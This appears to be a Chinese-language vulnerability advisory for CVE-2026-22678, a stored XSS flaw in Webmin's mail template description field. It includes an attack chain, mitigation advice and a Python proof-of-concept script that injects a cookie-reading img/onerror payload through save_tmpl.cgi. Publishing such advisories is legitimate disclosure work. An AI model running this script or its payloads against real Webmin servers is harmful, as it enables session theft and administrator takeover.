CVE-2026-22678 CVSS 5.4 中危

CVE-2026-22678 Webmin存储型XSS漏洞

披露日期: 2026-05-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-22678

漏洞类型

存储型跨站脚本 (Stored XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Webmin

漏洞概述

Webmin 2.641之前版本在System and Server Status模块的邮件模板描述字段存在存储型XSS漏洞。低权限认证攻击者可利用save_tmpl.cgi注入未经过滤的恶意输入，当管理员访问list_tmpls.cgi查看列表时，该输入未经转义直接渲染，导致在管理员浏览器中执行任意脚本。

技术细节

该漏洞源于Webmin在处理邮件模板描述时缺乏严格的输入验证和输出编码。攻击者首先需要拥有低权限账户并登录。随后，攻击者访问受影响模块，在描述字段中插入恶意的JavaScript代码（如<script>alert(1)</script>）。该请求被发送至save_tmpl.cgi处理并存储到后端数据库或文件中。当具有更高权限的管理员访问list_tmpls.cgi查看模板列表时，后端直接从存储中读取数据并渲染到前端页面，由于未对特殊字符进行HTML转义，嵌入的恶意代码将在受害者的浏览器上下文中执行。利用此漏洞，攻击者可在管理员浏览器中执行操作，进而可能达成远程代码执行（RCE）。

攻击链分析

STEP 1

步骤1

攻击者获取低权限账户并登录Webmin管理后台。

STEP 2

步骤2

导航至System and Server Status模块，找到邮件模板编辑功能。

STEP 3

步骤3

在邮件模板的描述字段中注入恶意JavaScript代码，并通过save_tmpl.cgi提交保存。

STEP 4

步骤4

服务器将恶意 payload 持久化存储。

STEP 5

步骤5

诱导管理员访问list_tmpls.cgi页面查看模板列表。

STEP 6

步骤6

管理员浏览器渲染页面时执行恶意脚本，导致Cookie窃取或执行管理员权限下的操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://target-webmin:10000"
username = "low_priv_user"
password = "password"
session = requests.Session()

# 1. Authenticate
login_data = {
    "user": username,
    "pass": password,
    "save": "Login"
}
session.post(f"{target_url}/session_login.cgi", data=login_data)

# 2. Exploit Stored XSS via save_tmpl.cgi
# Injecting a script that steals document.cookie
payload = '<img src=x onerror=alert(document.cookie)>'
exploit_data = {
    "name": "Malicious Template",
    "desc": payload,  # The vulnerable field
    "save": "Create"
}

# Sending request to the vulnerable endpoint
response = session.post(f"{target_url}/save_tmpl.cgi", data=exploit_data)

if response.status_code == 200:
    print("Payload injected successfully.")
    print(f"Wait for an admin to visit: {target_url}/list_tmpls.cgi")
else:
    print("Exploitation failed.")

影响范围

Webmin < 2.641

防御指南

临时缓解措施

建议立即升级至修复版本。如果无法立即升级，应限制对Webmin管理界面的访问，仅允许可信IP地址访问，并暂时回收低权限用户编辑邮件模板的权限，直到补丁应用完成。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表